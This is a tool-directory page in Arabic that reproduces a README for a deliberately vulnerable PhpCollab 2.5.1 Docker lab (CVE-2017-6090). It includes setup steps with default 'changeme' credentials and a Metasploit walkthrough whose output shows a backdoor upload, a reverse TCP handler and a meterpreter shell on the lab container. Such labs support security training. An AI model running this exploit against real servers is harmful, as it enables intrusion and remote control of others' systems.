Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit-CVE-2017-6090 — PhpCollab القابل للاستغلال في حاوية | Kitploit
أدوات/GitHubGitHub/jlk/exploit-cve-2017-6090
أمن الحاوياتأطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubjlk/exploit-cve-2017-6090

exploit-CVE-2017-6090

PhpCollab القابل للاستغلال في حاوية

عرض المستودع
15منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حاوية تحتوي على ثغرة قابلة للاستغلال CVE-2017-6090

Docker Pulls License

يقوم هذا المشروع ببناء حاوية تحتوي على PhpCollab 2.5.1، والتي تتضمن ثغرة تنفيذ تعليمات برمجية عن بُعد كما هو موضح في CVE-2017-6090. بالإضافة إلى ذلك، يوجد ملف docker-compose لبدء تلك الحاوية و mysql لعرض العرض التوضيحي، وتعليمات الاستغلال أدناه.

البناء

docker build -t اسم الحاوية . أو استخدم الصورة jlkinsel/exploit-cve-2017-6090

التشغيل والإعداد

أسهل طريقة لتشغيل هذا الشيء هي استخدام ملف docker-compose.yml المرفق. إذا شعرت بالملل في وقت ما - أو أظهر الأشخاص اهتماماً - سأقوم بإنشاء نشر kubernetes أو مخطط helm.

لذا، لبدء الأمور:

root@kitploit:~
docker-compose up

حتى الآن، كل شيء على ما يرام! الآن، يجب تكوين phpcollab لاستخدام قاعدة البيانات، وتعيين كلمة مرور افتراضية للمشرف. لقد حاولت (بإيجاز) أتمتة هذا، لكن...حسناً...تبدو كشخص يعرف كيفية استخدام متصفح...

  • انتقل إلى http://localhost:8088
  • قم بالتمرير إلى أسفل ترخيص GPL، وانقر على مربع "التثبيت دون اتصال" ثم انقر على الخطوة 2
  • أدخل البيانات التالية في الحقول، ثم انقر على حفظ:

أخيراً، يمكنك تسجيل الدخول والتجول، لكن هذا غير ضروري للاستغلال.

ملاحظة

لاحظ أن هذا التكوين docker لا يفعل أي شيء متطور للتخزين. إذا كنت ترغب في الاحتفاظ بقاعدة بيانات mysql، ستحتاج إلى إضافة تعريف وحدة تخزين لخدمة mysql في ملف docker-compose.yml. راجع الأمثلة على صفحة mariadb docker hub

الاستغلال

أولاً - اتبع التشغيل والإعداد أعلاه لتشغيل التطبيق.

لم أضف استغلالاً في هذا المشروع، لأنه، حسناً، Metasploit.

جديد في MSF؟ إليك نظرة سريعة على استغلال الحاوية التي بدأناها للتو:

root@kitploit:~
docker run -ti --network exploitcve20176090_default remnux/metasploit

يستغرق هذا بضع دقائق لتشغيل الأشياء. صفحة remnux/metasploit على docker hub تغطي استخدام وحدات التخزين حتى لا يستغرق هذا وقتاً طويلاً في المستقبل. لكننا الآن على وشك الانتهاء!

بمجرد الحصول على موجه الأوامر، فلنكمل:

root@kitploit:~
# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
TARGET => 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
TARGETURI => /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on 172.31.0.4:4444
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to 172.31.0.2
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

عند هذه النقطة، تكون قد دخلت، ويمكن أن تبدأ الألعاب.

ملاحظة

إذا كان اسم هذا الدليل شيئاً آخر غير "exploit-CVE-2017-6090" فسيتعين عليك تغيير الأمر --network أعلاه.

أيضاً - نعم، قمنا بتعيين المنفذ البعيد إلى 80 في msfconsole، على الرغم من أنه 8088 خارجياً. حاوية metasploit موجودة على نفس الشبكة مثل حاوية phpcollab.

تنزيل الأداة
الحقلالقيمة
خادم قاعدة البياناتmysql
تسجيل الدخول إلى قاعدة البياناتphpcollab
كلمة مرور قاعدة البياناتchangeme
اسم قاعدة البياناتphpcollab
الإشعاراتFalse
كلمة مرور المشرفchangeme (أو ما تريد)